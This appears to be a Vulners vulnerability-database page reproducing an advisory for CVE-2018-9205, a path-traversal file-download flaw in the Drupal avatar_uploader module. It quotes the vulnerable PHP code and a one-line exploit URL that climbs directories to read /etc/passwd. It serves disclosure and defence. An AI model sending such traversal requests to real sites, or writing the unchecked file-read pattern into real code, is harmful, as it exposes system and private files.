Vulners
Lucene search
Drupal Avatar Uploader 7.x-1.0-beta8 Arbitary File Download Vulnerability
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | CVE-2018-9205 | 4 Apr 201815:29 | – | attackerkb |
 | CVE-2018-9205 | 23 Dec 202400:00 | – | circl |
 | Drupal avatar_uploader arbitrary file download vulnerability | 9 Apr 201800:00 | – | cnvd |
 | CVE-2018-9205 | 4 Apr 201815:00 | – | cve |
 | CVE-2018-9205 | 4 Apr 201815:00 | – | cvelist |
 | Drupal Avatar Uploader File Disclosure | 19 May 201800:00 | – | dsquare |
 | Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | 23 Apr 201800:00 | – | exploitdb |
 | Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | 23 Apr 201800:00 | – | exploitpack |
 | Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion | 8 Jun 202604:09 | – | nuclei |
 | CVE-2018-9205 | 4 Apr 201815:29 | – | nvd |
10
Title: Arbitrary file download vulnerability in Drupal module avatar_uploader v7.x-1.0-beta8
Author: Larry W. Cashdollar
CVE-ID:[CVE-2018-9205]
Download Site: https://www.drupal.org/project/avatar_uploader
Vendor: https://www.drupal.org/u/robbinzhao
Vendor Notified: 2018-04-02
Vendor Contact: https://www.drupal.org/project/avatar_uploader/issues/2957966#comment-12554146
Advisory: http://www.vapidlabs.com/advisory.php?v=202
Description: This module used Simple Ajax Uploader, and provide a basic uploader panel, for more effect, you can do your custom javascript. Such as, users' mouse hover on avatar, the edit link will slideup, or others.
Vulnerability:
The view.php contains code to retrieve files but no code to verify a user should be able to view files or keep them from changing the path to outside of the uploadDir directory
<?php
$file = $_GET['file'];
echo file_get_contents("uploadDir/$file");
exit
Exploit Code:
aC/ http://example.com/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
# 0day.today [2018-04-22] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Apr 2018 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.81446